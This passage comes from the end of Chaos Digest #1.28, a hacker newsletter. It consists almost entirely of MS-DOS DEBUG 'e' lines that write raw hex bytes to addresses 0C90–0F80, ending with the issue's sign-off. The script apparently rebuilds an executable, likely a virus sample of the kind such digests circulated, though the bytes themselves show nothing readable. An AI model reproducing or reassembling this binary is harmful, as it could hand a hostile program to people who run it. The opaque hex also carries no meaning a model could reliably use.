  476. e 0C90  CF AD B3 37 AF 75 30 FE E2 CF AD 13 3A AF 07 30
  477. e 0CA0  FE 9B CF AD 29 3C AF 2D 30 FE 8C CF AD E7 3C AF
  478. e 0CB0  1F 30 FE 85 CF AD 79 20 AF 0E 30 FE BE CF AD 25
  479. e 0CC0  21 AF 0A 30 FE B7 CF AD 29 11 AF 44 30 FE A8 CF
  480. e 0CD0  AD 50 11 AF FB 30 FE A1 CF AD 4F 13 AF 1A 30 FE
  481. e 0CE0  5A CF AD 5E 2D AF 06 30 FE 53 CF AD 5F 2C AF 61
  482. e 0CF0  30 FE 44 CF 2A C3 44 0C 0D F7 10 BB 15 E2 D7 8B
  483. e 0D00  8E 06 AC 18 70 03 D6 AD E8 D1 25 36 16 DC CF FE
  484. e 0D10  FE 26 FE 86 C7 FE 52 25 D3 D0 5B A7 D0 78 24 41
  485. e 0D20  83 CB 11 FF C3 FA DB 26 FB 18 D8 0B 90 3D 87 93
  486. e 0D30  F2 81 C3 3D DF 94 37 70 D8 E5 02 63 FF C5 91 6E
  487. e 0D40  D8 78 F3 96 89 52 7B 0E 39 A9 07 03 FB 74 23 FB
  488. e 0D50  5F 29 3D FE 20 FC 24 CE FB 01 08 ED 0E C9 37 E8
  489. e 0D60  C7 EE 46 FC 7D 8B D2 36 CC 9A EC 32 E1 31 32 62
  490. e 0D70  3E 32 9F 3E 54 27 47 19 D2 36 EC 4F ED F4 03 FF
  491. e 0D80  32 D8 E7 25 CA 2F FE 73 CF D0 FC 46 DC F0 C9 C4
  492. e 0D90  4C EB 1F EA C3 DA 14 1A 2D E3 54 82 D2 42 FC 03
  493. e 0DA0  ED F4 72 DF DB D9 21 3A E8 8E 2E D9 3D 03 03 FB
  494. e 0DB0  91 DB 0D 4C E1 03 4D E1 DF 07 B6 D6 48 E1 DF 01
  495. e 0DC0  B6 D6 08 68 D4 CC 25 83 C5 2E 5B A4 68 4E A4 D2
  496. e 0DD0  4B 53 CD 98 2E E0 97 10 34 FA 5D 9F 17 00 AA C8
  497. e 0DE0  09 CD 9D DB F7 F0 E2 DA 9A C8 9F 0F 00 24 34 43
  498. e 0DF0  C4 E8 50 AD 1C 0E 7E C3 EF CF 0E 04 1A 12 74 36
  499. e 0E00  FA 88 D0 12 CB A7 E8 34 0E 61 F8 A7 E2 21 07 B2
  500. e 0E10  E8 16 EE 28 26 3D 83 28 A0 24 27 3D 8C 20 35 24
  501. e 0E20  08 9A 1E 02 37 E8 B4 E5 2E D9 05 66 03 FB 0C D1
  502. e 0E30  3D C4 38 37 24 00 D6 77 34 FB 4D 32 3A 73 25 FA
  503. e 0E40  9E 26 3D 80 00 A0 24 D8 90 FE 27 67 41 CE E0 FC
  504. e 0E50  3E 13 8B 22 10 44 24 40 8B 7A 17 81 D5 5B 53 A7
  505. e 0E60  E0 49 60 12 D8 7D FB 20 32 0A 75 71 FB D4 DA 08
  506. e 0E70  00 AD 4F 01 AD 93 4B FA 9A 04 AD 93 4D FA 9A 44
  507. e 0E80  24 98 80 69 CF 89 62 17 E8 D8 00 1C CD 26 E8 94
  508. e 0E90  EF 30 26 98 16 3C 13 E8 A9 17 2E AD 1D A3 02 90
  509. e 0EA0  C1 36 12 CA 00 9A 57 32 B2 18 26 35 89 61 01 A1
  510. e 0EB0  34 13 03 E7 35 89 61 03 A1 32 13 26 AF 54 0E CE
  511. e 0EC0  D4 13 17 FB 7D DA 0B 00 CE 4D 04 08 9D 1E 85 37
  512. e 0ED0  8B 60 11 A3 2C 13 8B 60 17 A3 2A 13 E8 8C 00 19
  513. e 0EE0  CF D3 F8 08 9F 0E 1C 11 2E AA 05 3C 24 3D 89 00
  514. e 0EF0  2D 02 08 D5 06 1F 11 01 38 4B E8 60 EF 37 B6 6B
  515. e 0F00  AA 40 37 BA 98 7C 86 D0 A6 11 4F 4B 97 C5 88 11
  516. e 0F10  4F 44 97 C3 88 10 48 87 E2 B0 AD 56 B0 59 B4 B7
  517. e 0F20  AD 10 88 59 B4 B6 F7 97 5E 0C 65 EE 6A 93 B6 6B
  518. e 0F30  18 43 6B C4 A5 BB 2E A6 2D DA 02 13 74 25 FA 20
  519. e 0F40  27 D0 E8 D8 E8 27 96 8D 76 90 A2 B0 7F 8D 76 90
  520. e 0F50  A1 B0 2E 8D 76 90 A0 B0 B5 4B 62 87 4B 9D 97 65
  521. e 0F60  B6 B6 A3 B1 17 9D B0 B2 EE EA 7E BF A3 BE 67 0E
  522. e 0F70  A7 2D 00 02 49 4D 52 15 FE 28 33 00 52 68 E8 E4
  523. e 0F80  E8 10 44 D0 66 60 A0 83 B3 90 67 44 73 5B B4 99
  524.  
  525. ------------------------------
  526.  
  527. End of Chaos Digest #1.28
  528. ************************************
  529.